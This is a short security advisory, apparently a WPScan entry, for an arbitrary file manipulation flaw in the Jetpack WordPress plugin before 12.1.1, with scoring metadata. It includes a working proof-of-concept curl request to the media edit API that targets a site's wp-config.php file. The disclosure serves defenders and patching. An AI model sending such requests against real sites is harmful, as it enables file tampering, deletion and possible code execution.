Lucene search

K
wpvulndbWPScanWPVDB-ID:52D221BD-AE42-435D-A90A-60A5AE530663
HistoryMay 30, 2023 - 12:00 a.m.

Jetpack < 12.1.1 - Author+ Arbitrary File Manipulation via API

2023-05-3000:00:00
WPScan
wpscan.com
21
jetpack plugin
vulnerability
arbitrary file manipulation
api
file validation
author+ roles
rce
phar deserialization
wordpress

0.003 Low

EPSS

Percentile

70.8%

The plugin does not validate uploaded files, allowing users with author roles or above to manipulate existing files on the site, deleting arbitrary files, and in rare cases achieve Remote Code Execution via phar deserialization.

PoC

curl --json ‘{ “media”: {“tmp_name”: “/WP_CONTENT_PATH/wp-config.php”, “name”: “test.txt”} }’ https://public-api.wordpress.com/rest/v1.2/sites/BLOG_ID/media/1/edit Where BLOG_ID is the site Jetpack blog id.

CPENameOperatorVersion
jetpacklt12.1.1

0.003 Low

EPSS

Percentile

70.8%

Related for WPVDB-ID:52D221BD-AE42-435D-A90A-60A5AE530663